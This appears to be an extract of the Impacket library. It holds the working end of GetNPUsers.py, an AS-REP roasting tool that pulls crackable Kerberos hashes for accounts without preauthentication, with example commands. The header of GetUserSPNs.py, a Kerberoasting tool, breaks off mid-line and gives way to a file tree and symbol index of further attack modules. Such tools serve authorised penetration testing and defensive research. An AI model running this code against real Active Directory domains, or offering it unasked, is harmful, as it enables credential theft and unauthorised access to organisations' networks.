hexlify(asRep['enc-part']['cipher'].asOctets()[-12:]).decode(),
hexlify(asRep['enc-part']['cipher'].asOctets()[:-12]).decode())
else:
return '$krb5asrep$%d$%s@%s:%s$%s' % (asRep['enc-part']['etype'], clientName, domain,
hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())
@staticmethod
def outputTGT(entry, fd=None):
print(entry)
if fd is not None:
fd.write(entry + '\n')
def run(self):
if self.__usersFile:
self.request_users_file_TGTs()
return
# Are we asked not to supply a password?
if self.__doKerberos is False and self.__no_pass is True:
# Yes, just ask the TGT and exit
logging.info('Getting TGT for %s' % self.__username)
entry = self.getTGT(self.__username)
self.request_multiple_TGTs([self.__username])
return
try:
# Connect to LDAP
ldapConnection = ldap_login(self.__target, self.baseDN, self.__kdcIP, self.__kdcHost, self.__doKerberos, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
# updating "self.__target" as it may have changed in the ldap_login processing
self.__target = ldapConnection._dstHost
except ldap.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') < 0:
# Cannot authenticate, we will try to get this users' TGT (hoping it has PreAuth disabled)
logging.info('Cannot authenticate %s, getting its TGT' % self.__username)
entry = self.getTGT(self.__username)
self.request_multiple_TGTs([self.__username])
return
# Building the search filter
searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
(UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=999)
except ldap.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
if str(e).find('NTLMAuthNegotiate') >= 0:
logging.critical("NTLM negotiation failed. Probably NTLM is disabled. Try to use Kerberos "
"authentication instead.")
else:
if self.__kdcIP is not None and self.__kdcHost is not None:
logging.critical("If the credentials are valid, check the hostname and IP address of KDC. They "
"must match exactly each other")
raise
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
self.printTable(answers, header=[ "Name", "MemberOf", "PasswordLastSet", "LastLogon", "UAC"])
print('\n\n')
if self.__requestTGT is True:
usernames = [answer[0] for answer in answers]
self.request_multiple_TGTs(usernames)
else:
print("No entries found!")
def request_users_file_TGTs(self):
with open(self.__usersFile) as fi:
usernames = [line.strip() for line in fi]
self.request_multiple_TGTs(usernames)
def request_multiple_TGTs(self, usernames):
if self.__outputFileName is not None:
fd = open(self.__outputFileName, 'w+')
else:
fd = None
for username in usernames:
try:
entry = self.getTGT(username)
self.outputTGT(entry, fd)
except Exception as e:
logging.error('%s' % str(e))
if fd is not None:
fd.close()
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for users with "
"'Do not require Kerberos preauthentication' set and export their TGTs for cracking")
parser.add_argument('target', action='store', help='[[domain/]username[:password]]')
parser.add_argument('-request', action='store_true', default=False, help='Requests TGT for users and output them '
'in JtR/hashcat format (default False)')
parser.add_argument('-outputfile', action='store',
help='Output filename to write ciphers in JtR/hashcat format')
parser.add_argument('-format', choices=['hashcat', 'john'], default='hashcat',
help='format to save the AS_REQ of users without pre-authentication. Default is hashcat')
parser.add_argument('-usersfile', help='File with user per line to test')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) '
'specified in the target parameter')
group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller to use. '
'If ommited, the domain part (FQDN) '
'specified in the account parameter will be used')
if len(sys.argv)==1:
parser.print_help()
print("\nThere are a few modes for using this script")
print("\n1. Get a TGT for a user:")
print("\n\tGetNPUsers.py contoso.com/john.doe -no-pass")
print("\nFor this operation you don\'t need john.doe\'s password. It is important tho, to specify -no-pass in the script, "
"\notherwise a badpwdcount entry will be added to the user")
print("\n2. Get a list of users with UF_DONT_REQUIRE_PREAUTH set")
print("\n\tGetNPUsers.py contoso.com/emily:password or GetNPUsers.py contoso.com/emily")
print("\nThis will list all the users in the contoso.com domain that have UF_DONT_REQUIRE_PREAUTH set. \nHowever "
"it will require you to have emily\'s password. (If you don\'t specify it, it will be asked by the script)")
print("\n3. Request TGTs for all users")
print("\n\tGetNPUsers.py contoso.com/emily:password -request or GetNPUsers.py contoso.com/emily")
print("\n4. Request TGTs for users in a file")
print("\n\tGetNPUsers.py -no-pass -usersfile users.txt contoso.com/")
print("\nFor this operation you don\'t need credentials.")
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts, options.debug)
domain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
if options.k is False and options.no_pass is True and username == '' and options.usersfile is None:
logging.critical('If the -no-pass option was specified, but Kerberos (-k) is not used, then a username or the -usersfile option should be specified!')
sys.exit(1)
if options.outputfile is not None:
options.request = True
try:
executer = GetUserNoPreAuth(username, password, domain, options)
executer.run()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
================================================
FILE: examples/GetUserSPNs.py
================================================
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# This module will try to find Service Principal Names that are associated with normal user account.
# Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request
# will encrypt the ticket with the account the SPN is running under, this could be used for an offline
# bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
# This is part of the kerberoast attack researched by Tim Medin (@timmedin) and detailed at
# https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
#
# Original idea of implementing this in Python belongs to @skelsec and his
# https://github.com/skelsec/PyKerberoast project
#
# This module provides a Python implementation for this attack, adding also the ability to PtH/Ticket/Key.
# Also, disabled accounts won't be shown.
#
# Author:
# Alberto Solino (@agsolino)
#
# ToDo:
# [X] Add the capability for requesting TGS and output them in JtR/hashcat format
#
from __future__ import division
from __future__ import print_function
import argparse
import logging
import sys
from datetime import datetime
from binascii import hexlify, unhexlify
from pyasn1.codec.der import decoder
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_TRUSTED_FOR_DELEGATION, \
UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
from impacket.examples import logger
from impacket.examples.utils import parse_identity, ldap_login
from impacket.krb5 import constants
from impacket.krb5.asn1 import TGS_REP, AS_REP
from impacket.krb5.ccache import CCache
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5.types import Principal
from impacket.ldap import ldap, ldapasn1
from impacket.ntlm import compute_lmhash, compute_nthash
class GetUserSPNs:
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def __init__(self, username, password, user_domain, target_domain, cmdLineOptions):
self.__username = username
self.__password = password
self.__domain = user_domain
self.__target = None
self.__targetDomain = target_domain
self.__lmhash = ''
self.__nthash = ''
self.__no_preauth = cmdLineOptions.no_preauth
self.__outputFileName = cmdLineOptions.outputfile
self.__usersFile = cmdLineOptions.usersfile
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__requestTGS = cmdLineOptions.request
# [!] in this script the value of -dc-ip option is self.__kdcIP and the value of -dc-host option is self.__kdcHost
self.__kdcIP = cmdLineOptions.dc_ip
self.__kdcHost = cmdLineOptions.dc_host
self.__saveTGS = cmdLineOptions.save
self.__requestUser = cmdLineOptions.request_user
self.__stealth = cmdLineOptions.stealth
self.__machineOnly = cmdLineOptions.machine_only
self.__requestMachine = cmdLineOptions.request_machine
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__targetDomain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
# We can't set the KDC to a custom IP or Hostname when requesting things cross-domain
# because then the KDC host will be used for both
# the initial and the referral ticket, which breaks stuff.
if user_domain != self.__targetDomain and (self.__kdcIP or self.__kdcHost):
logging.warning('KDC IP address and hostname will be ignored because of cross-domain targeting.')
self.__kdcIP = None
self.__kdcHost = None
@staticmethod
def getUnixTime(t):
t -= 116444736000000000
t /= 10000000
return t
def getTGT(self):
domain, _, TGT, _ = CCache.parseFile(self.__domain)
if TGT is not None:
return TGT
# No TGT in cache, request it
userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
# In order to maximize the probability of getting session tickets with RC4 etype, we will convert the
# password to ntlm hashes (that will force to use RC4 for the TGT). If that doesn't work, we use the
# cleartext password.
# If no clear text password is provided, we just go with the defaults.
if self.__password != '' and (self.__lmhash == '' and self.__nthash == ''):
try:
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, '', self.__domain,
compute_lmhash(self.__password),
compute_nthash(self.__password), self.__aesKey,
kdcHost=self.__kdcIP)
except Exception as e:
logging.debug('TGT: %s' % str(e))
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(self.__lmhash),
unhexlify(self.__nthash), self.__aesKey,
kdcHost=self.__kdcIP)
else:
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(self.__lmhash),
unhexlify(self.__nthash), self.__aesKey,
kdcHost=self.__kdcIP)
TGT = {}
TGT['KDC_REP'] = tgt
TGT['cipher'] = cipher
TGT['sessionKey'] = sessionKey
return TGT
def outputTGS(self, ticket, oldSessionKey, sessionKey, username, spn, fd=None):
if self.__no_preauth:
decodedTGS = decoder.decode(ticket, asn1Spec=AS_REP())[0]
else:
decodedTGS = decoder.decode(ticket, asn1Spec=TGS_REP())[0]
# According to RFC4757 (RC4-HMAC) the cipher part is like:
# struct EDATA {
# struct HEADER {
# OCTET Checksum[16];
# OCTET Confounder[8];
# } Header;
# OCTET Data[0];
# } edata;
#
# In short, we're interested in splitting the checksum and the rest of the encrypted data
#
# Regarding AES encryption type (AES128 CTS HMAC-SHA1 96 and AES256 CTS HMAC-SHA1 96)
# last 12 bytes of the encrypted ticket represent the checksum of the decrypted
# ticket
if decodedTGS['ticket']['enc-part']['etype'] == constants.Encrypt
gitextract_c4q1h4g5/ ├── .github/ │ ├── ISSUE_TEMPLATE/ │ │ └── bug_report.md │ ├── labeler.yml │ └── workflows/ │ ├── build_and_test.yml │ └── labeler.yml ├── .gitignore ├── ChangeLog.md ├── Dockerfile ├── LICENSE ├── MANIFEST.in ├── README.md ├── SECURITY.md ├── TESTING.md ├── examples/ │ ├── CheckLDAPStatus.py │ ├── DumpNTLMInfo.py │ ├── Get-GPPPassword.py │ ├── GetADComputers.py │ ├── GetADUsers.py │ ├── GetLAPSPassword.py │ ├── GetNPUsers.py │ ├── GetUserSPNs.py │ ├── addcomputer.py │ ├── atexec.py │ ├── attrib.py │ ├── badsuccessor.py │ ├── changepasswd.py │ ├── dacledit.py │ ├── dcomexec.py │ ├── describeTicket.py │ ├── dpapi.py │ ├── esentutl.py │ ├── exchanger.py │ ├── filetime.py │ ├── findDelegation.py │ ├── getArch.py │ ├── getPac.py │ ├── getST.py │ ├── getTGT.py │ ├── goldenPac.py │ ├── karmaSMB.py │ ├── keylistattack.py │ ├── kintercept.py │ ├── lookupsid.py │ ├── machine_role.py │ ├── mimikatz.py │ ├── mqtt_check.py │ ├── mssqlclient.py │ ├── mssqlinstance.py │ ├── net.py │ ├── netview.py │ ├── ntfs-read.py │ ├── ntlmrelayx.py │ ├── owneredit.py │ ├── ping.py │ ├── ping6.py │ ├── psexec.py │ ├── raiseChild.py │ ├── rbcd.py │ ├── rdp_check.py │ ├── reg.py │ ├── registry-read.py │ ├── regsecrets.py │ ├── rpcdump.py │ ├── rpcmap.py │ ├── sambaPipe.py │ ├── samedit.py │ ├── samrdump.py │ ├── secretsdump.py │ ├── services.py │ ├── smbclient.py │ ├── smbexec.py │ ├── smbserver.py │ ├── sniff.py │ ├── sniffer.py │ ├── split.py │ ├── ticketConverter.py │ ├── ticketer.py │ ├── tstool.py │ ├── wmiexec.py │ ├── wmipersist.py │ └── wmiquery.py ├── impacket/ │ ├── Dot11Crypto.py │ ├── Dot11KeyManager.py │ ├── ICMP6.py │ ├── IP6.py │ ├── IP6_Address.py │ ├── IP6_Extension_Headers.py │ ├── ImpactDecoder.py │ ├── ImpactPacket.py │ ├── NDP.py │ ├── __init__.py │ ├── acl.py │ ├── cdp.py │ ├── crypto.py │ ├── dcerpc/ │ │ ├── __init__.py │ │ └── v5/ │ │ ├── __init__.py │ │ ├── atsvc.py │ │ ├── bkrp.py │ │ ├── dcom/ │ │ │ ├── __init__.py │ │ │ ├── comev.py │ │ │ ├── oaut.py │ │ │ ├── scmp.py │ │ │ ├── vds.py │ │ │ └── wmi.py │ │ ├── dcomrt.py │ │ ├── dhcpm.py │ │ ├── drsuapi.py │ │ ├── dssp.py │ │ ├── dtypes.py │ │ ├── enum.py │ │ ├── epm.py │ │ ├── even.py │ │ ├── even6.py │ │ ├── gkdi.py │ │ ├── icpr.py │ │ ├── iphlp.py │ │ ├── lsad.py │ │ ├── lsat.py │ │ ├── mgmt.py │ │ ├── mimilib.py │ │ ├── ndr.py │ │ ├── nrpc.py │ │ ├── nspi.py │ │ ├── oxabref.py │ │ ├── par.py │ │ ├── rpch.py │ │ ├── rpcrt.py │ │ ├── rprn.py │ │ ├── rrp.py │ │ ├── samr.py │ │ ├── sasec.py │ │ ├── scmr.py │ │ ├── srvs.py │ │ ├── transport.py │ │ ├── tsch.py │ │ ├── tsts.py │ │ └── wkst.py │ ├── dhcp.py │ ├── dns.py │ ├── dot11.py │ ├── dpapi.py │ ├── dpapi_ng.py │ ├── eap.py │ ├── ese.py │ ├── examples/ │ │ ├── __init__.py │ │ ├── ldap_shell.py │ │ ├── logger.py │ │ ├── mssqlshell.py │ │ ├── ntlmrelayx/ │ │ │ ├── __init__.py │ │ │ ├── attacks/ │ │ │ │ ├── __init__.py │ │ │ │ ├── dcsyncattack.py │ │ │ │ ├── httpattack.py │ │ │ │ ├── httpattacks/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── adcsattack.py │ │ │ │ │ ├── sccmdpattack.py │ │ │ │ │ └── sccmpoliciesattack.py │ │ │ │ ├── imapattack.py │ │ │ │ ├── ldapattack.py │ │ │ │ ├── mssqlattack.py │ │ │ │ ├── rpcattack.py │ │ │ │ ├── smbattack.py │ │ │ │ └── winrmattack.py │ │ │ ├── clients/ │ │ │ │ ├── __init__.py │ │ │ │ ├── dcsyncclient.py │ │ │ │ ├── httprelayclient.py │ │ │ │ ├── imaprelayclient.py │ │ │ │ ├── ldaprelayclient.py │ │ │ │ ├── mssqlrelayclient.py │ │ │ │ ├── rpcrelayclient.py │ │ │ │ ├── smbrelayclient.py │ │ │ │ ├── smtprelayclient.py │ │ │ │ └── winrmrelayclient.py │ │ │ ├── servers/ │ │ │ │ ├── __init__.py │ │ │ │ ├── httprelayserver.py │ │ │ │ ├── mssqlrelayserver.py │ │ │ │ ├── rawrelayserver.py │ │ │ │ ├── rdprelayserver.py │ │ │ │ ├── rpcrelayserver.py │ │ │ │ ├── smbrelayserver.py │ │ │ │ ├── socksplugins/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── http.py │ │ │ │ │ ├── https.py │ │ │ │ │ ├── imap.py │ │ │ │ │ ├── imaps.py │ │ │ │ │ ├── ldap.py │ │ │ │ │ ├── ldaps.py │ │ │ │ │ ├── mssql.py │ │ │ │ │ ├── smb.py │ │ │ │ │ └── smtp.py │ │ │ │ ├── socksserver.py │ │ │ │ ├── wcfrelayserver.py │ │ │ │ ├── winrmrelayserver.py │ │ │ │ └── winrmsrelayserver.py │ │ │ └── utils/ │ │ │ ├── __init__.py │ │ │ ├── config.py │ │ │ ├── enum.py │ │ │ ├── identity_log.py │ │ │ ├── rdp_ssl.py │ │ │ ├── shadow_credentials.py │ │ │ ├── ssl.py │ │ │ ├── targetsutils.py │ │ │ └── tcpshell.py │ │ ├── os_ident.py │ │ ├── regsecrets.py │ │ ├── remcomsvc.py │ │ ├── rpcdatabase.py │ │ ├── secretsdump.py │ │ ├── serviceinstall.py │ │ ├── smbclient.py │ │ └── utils.py │ ├── helper.py │ ├── hresult_errors.py │ ├── http.py │ ├── krb5/ │ │ ├── __init__.py │ │ ├── asn1.py │ │ ├── ccache.py │ │ ├── constants.py │ │ ├── crypto.py │ │ ├── gssapi.py │ │ ├── kerberosv5.py │ │ ├── keytab.py │ │ ├── kpasswd.py │ │ ├── pac.py │ │ └── types.py │ ├── ldap/ │ │ ├── __init__.py │ │ ├── ldap.py │ │ ├── ldapasn1.py │ │ └── ldaptypes.py │ ├── mapi_constants.py │ ├── mqtt.py │ ├── msada_guids.py │ ├── mssql/ │ │ └── version.py │ ├── nmb.py │ ├── nt_errors.py │ ├── ntlm.py │ ├── pcap_linktypes.py │ ├── pcapfile.py │ ├── smb.py │ ├── smb3.py │ ├── smb3structs.py │ ├── smbconnection.py │ ├── smbserver.py │ ├── spnego.py │ ├── structure.py │ ├── system_errors.py │ ├── tds.py │ ├── uuid.py │ ├── version.py │ ├── winregistry.py │ └── wps.py ├── requirements-test.txt ├── requirements.txt ├── setup.py ├── tests/ │ ├── ImpactPacket/ │ │ ├── __init__.py │ │ ├── test_ICMP6.py │ │ ├── test_IP.py │ │ ├── test_IP6.py │ │ ├── test_IP6_Address.py │ │ ├── test_IP6_Extension_Headers.py │ │ ├── test_IP_fragment_issue2095.py │ │ ├── test_LinuxSLL.py │ │ ├── test_TCP.py │ │ ├── test_TCP_bug_issue7.py │ │ └── test_ethernet.py │ ├── SMB_RPC/ │ │ ├── __init__.py │ │ ├── test_acl.py │ │ ├── test_ldap.py │ │ ├── test_ndr.py │ │ ├── test_nmb.py │ │ ├── test_ntlm.py │ │ ├── test_rpch.py │ │ ├── test_rpcrt.py │ │ ├── test_secretsdump.py │ │ ├── test_smb.py │ │ ├── test_smbserver.py │ │ ├── test_spnego.py │ │ └── test_wmi.py │ ├── __init__.py │ ├── conftest.py │ ├── data/ │ │ ├── ccache-v1 │ │ ├── ccache-v2 │ │ ├── ccache-v3 │ │ ├── ccache-v3-kirbi │ │ ├── ccache-v4 │ │ └── ccache-v4-kirbi │ ├── dcerpc/ │ │ ├── __init__.py │ │ ├── test_bkrp.py │ │ ├── test_dcomrt.py │ │ ├── test_dhcpm.py │ │ ├── test_drsuapi.py │ │ ├── test_epm.py │ │ ├── test_even.py │ │ ├── test_even6.py │ │ ├── test_fasp.py │ │ ├── test_lsad.py │ │ ├── test_lsat.py │ │ ├── test_mgmt.py │ │ ├── test_mimilib.py │ │ ├── test_nrpc.py │ │ ├── test_par.py │ │ ├── test_rprn.py │ │ ├── test_rrp.py │ │ ├── test_samr.py │ │ ├── test_scmr.py │ │ ├── test_srvs.py │ │ ├── test_tsch.py │ │ └── test_wkst.py │ ├── dcetests.cfg.template │ ├── dot11/ │ │ ├── __init__.py │ │ ├── test_Dot11Base.py │ │ ├── test_Dot11Decoder.py │ │ ├── test_Dot11HierarchicalUpdate.py │ │ ├── test_FrameControlACK.py │ │ ├── test_FrameControlCFEnd.py │ │ ├── test_FrameControlCFEndCFACK.py │ │ ├── test_FrameControlCTS.py │ │ ├── test_FrameControlPSPoll.py │ │ ├── test_FrameControlRTS.py │ │ ├── test_FrameData.py │ │ ├── test_FrameManagement.py │ │ ├── test_FrameManagementAssociationRequest.py │ │ ├── test_FrameManagementAssociationResponse.py │ │ ├── test_FrameManagementAuthentication.py │ │ ├── test_FrameManagementDeauthentication.py │ │ ├── test_FrameManagementDisassociation.py │ │ ├── test_FrameManagementProbeRequest.py │ │ ├── test_FrameManagementProbeResponse.py │ │ ├── test_FrameManagementReassociationRequest.py │ │ ├── test_FrameManagementReassociationResponse.py │ │ ├── test_RadioTap.py │ │ ├── test_RadioTapDecoder.py │ │ ├── test_WEPDecoder.py │ │ ├── test_WEPEncoder.py │ │ ├── test_WPA.py │ │ ├── test_WPA2.py │ │ ├── test_helper.py │ │ └── test_wps.py │ ├── misc/ │ │ ├── __init__.py │ │ ├── test_ccache.py │ │ ├── test_crypto.py │ │ ├── test_dcerpc_v5_ndr.py │ │ ├── test_dns.py │ │ ├── test_dpapi.py │ │ ├── test_ip6_address.py │ │ ├── test_krb5_crypto.py │ │ ├── test_krb5_gssapi.py │ │ ├── test_ntfs_read.py │ │ ├── test_structure.py │ │ └── test_utils.py │ └── walkmodules.py └── tox.ini
Showing preview only (891K chars total). Download the full file or copy to clipboard to get everything.
SYMBOL INDEX (11233 symbols across 300 files)
FILE: examples/CheckLDAPStatus.py
class CheckLDAP (line 30) | class CheckLDAP:
method __init__ (line 31) | def __init__(self, domain, dc_ip, timeout):
method list_dc (line 36) | def list_dc(self):
method run (line 47) | def run(self):
method check_ldaps_cbt (line 55) | def check_ldaps_cbt(self, hostname):
method check_ldap_signing (line 87) | def check_ldap_signing(self, hostname):
FILE: examples/DumpNTLMInfo.py
class RPC (line 65) | class RPC:
method __init__ (line 66) | def __init__(self, target) -> None:
method GetChallange (line 70) | def GetChallange(self):
method _initializeTransport (line 84) | def _initializeTransport(self, target):
method _create_bind_request (line 90) | def _create_bind_request(self):
class SMB1 (line 119) | class SMB1:
method __init__ (line 120) | def __init__(self, remote_name, remote_host, my_name=None,
method GetNegotiateResponse (line 138) | def GetNegotiateResponse(self):
method GetChallange (line 141) | def GetChallange(self):
method Authenticate (line 160) | def Authenticate(self):
method send (line 187) | def send(self, negoPacket):
method receive (line 194) | def receive(self):
method _negotiateSession (line 198) | def _negotiateSession(self, negPacket = None):
method _createSessionSetupRequest (line 234) | def _createSessionSetupRequest(self):
method _wrapper (line 257) | def _wrapper(self, sessionResponse):
method _to_long_filetime (line 270) | def _to_long_filetime(self, dwLowDateTime, dwHighDateTime):
class SMB3 (line 277) | class SMB3:
method __init__ (line 278) | def __init__(self, remote_name, remote_host, my_name=None,
method GetNegotiateResponse (line 293) | def GetNegotiateResponse(self):
method GetChallange (line 296) | def GetChallange(self):
method Authenticate (line 308) | def Authenticate(self):
method send (line 335) | def send(self, packet):
method receive (line 347) | def receive(self):
method _negotiateSession (line 352) | def _negotiateSession(self, negSessionResponse = None):
method _createSessionSetupRequest (line 376) | def _createSessionSetupRequest(self, dialect):
class SmbConnection (line 398) | class SmbConnection:
method __init__ (line 399) | def __init__(self, ip, hostname, port) -> None:
method IsSmb1Enabled (line 408) | def IsSmb1Enabled(self):
method NegotiateSession (line 422) | def NegotiateSession(self):
method GetChallange (line 440) | def GetChallange(self):
method Authenticate (line 443) | def Authenticate(self):
method _negotiateSessionWildcard (line 446) | def _negotiateSessionWildcard(self, extended_security=True, flags1=0, ...
method _get_my_name (line 475) | def _get_my_name(self):
class DumpNtlm (line 483) | class DumpNtlm:
method __init__ (line 484) | def __init__(self, ip, hostname, port, protocol) -> None:
method DisplayInfo (line 491) | def DisplayInfo(self):
method DisplayRpcInfo (line 497) | def DisplayRpcInfo(self):
method DisplaySmbInfo (line 505) | def DisplaySmbInfo(self):
method DisplaySigning (line 526) | def DisplaySigning(self, secMode):
method DisplayDialect (line 537) | def DisplayDialect(self, dialect, smb1_enabled):
method DisplayIo (line 557) | def DisplayIo(self, negotiateResponse):
method DisplayTime (line 562) | def DisplayTime(self, negotiateResponse):
method DisplayChallangeInfo (line 571) | def DisplayChallangeInfo(self, challange):
method DisplayNullSession (line 611) | def DisplayNullSession(self, nullSession):
method __filetime_to_dt (line 615) | def __filetime_to_dt(self, filetime):
method __convert_size (line 621) | def __convert_size(self, size_bytes):
FILE: examples/Get-GPPPassword.py
class GetGPPasswords (line 40) | class GetGPPasswords(object):
method __init__ (line 43) | def __init__(self, smb, share):
method list_shares (line 48) | def list_shares(self):
method find_cpasswords (line 57) | def find_cpasswords(self, base_dir, extension="xml"):
method parse_xmlfile_content (line 87) | def parse_xmlfile_content(self, filename, filecontent):
method parse (line 151) | def parse(self, filename):
method decrypt_password (line 179) | def decrypt_password(self, pw_enc_b64):
method show (line 199) | def show(self, results):
function parse_args (line 209) | def parse_args():
function parse_target (line 237) | def parse_target(args):
function init_smb_session (line 260) | def init_smb_session(args, domain, username, password, address, lmhash, ...
FILE: examples/GetADComputers.py
class GetADComputers (line 45) | class GetADComputers:
method __init__ (line 46) | def __init__(self, username, password, domain, cmdLineOptions):
method getUnixTime (line 86) | def getUnixTime(t):
method processRecord (line 91) | def processRecord(self, item):
method run (line 157) | def run(self):
FILE: examples/GetADUsers.py
class GetADUsers (line 41) | class GetADUsers:
method __init__ (line 42) | def __init__(self, username, password, domain, cmdLineOptions):
method getUnixTime (line 75) | def getUnixTime(t):
method processRecord (line 80) | def processRecord(self, item):
method run (line 112) | def run(self):
FILE: examples/GetLAPSPassword.py
class GetLAPSPassword (line 44) | class GetLAPSPassword:
method printTable (line 46) | def printTable(items, header, outputfile):
method __init__ (line 67) | def __init__(self, username, password, domain, cmdLineOptions):
method getLAPSv2Decrypt (line 95) | def getLAPSv2Decrypt(self, rawEncryptedLAPSBlob):
method getUnixTime (line 159) | def getUnixTime(t):
method run (line 164) | def run(self):
FILE: examples/GetNPUsers.py
class GetUserNoPreAuth (line 52) | class GetUserNoPreAuth:
method printTable (line 54) | def printTable(items, header):
method __init__ (line 70) | def __init__(self, username, password, domain, cmdLineOptions):
method getUnixTime (line 99) | def getUnixTime(t):
method getTGT (line 104) | def getTGT(self, userName, requestPAC=True):
method outputTGT (line 203) | def outputTGT(entry, fd=None):
method run (line 208) | def run(self):
method request_users_file_TGTs (line 311) | def request_users_file_TGTs(self):
method request_multiple_TGTs (line 317) | def request_multiple_TGTs(self, usernames):
FILE: examples/GetUserSPNs.py
class GetUserSPNs (line 56) | class GetUserSPNs:
method printTable (line 58) | def printTable(items, header):
method __init__ (line 74) | def __init__(self, username, password, user_domain, target_domain, cmd...
method getUnixTime (line 118) | def getUnixTime(t):
method getTGT (line 123) | def getTGT(self):
method outputTGS (line 160) | def outputTGS(self, ticket, oldSessionKey, sessionKey, username, spn, ...
method run (line 234) | def run(self):
method request_users_file_TGSs (line 389) | def request_users_file_TGSs(self):
method request_multiple_TGSs (line 396) | def request_multiple_TGSs(self, usernames):
FILE: examples/addcomputer.py
class ADDCOMPUTER (line 50) | class ADDCOMPUTER:
method __init__ (line 51) | def __init__(self, username, password, domain, cmdLineOptions):
method run_samr (line 129) | def run_samr(self):
method run_ldaps (line 149) | def run_ldaps(self):
method LDAPComputerExists (line 229) | def LDAPComputerExists(self, connection, computerName):
method LDAPGetComputer (line 233) | def LDAPGetComputer(self, connection, computerName):
method generateComputerName (line 237) | def generateComputerName(self):
method doSAMRAdd (line 240) | def doSAMRAdd(self, rpctransport):
method run (line 361) | def run(self):
FILE: examples/atexec.py
class TSCH_EXEC (line 45) | class TSCH_EXEC:
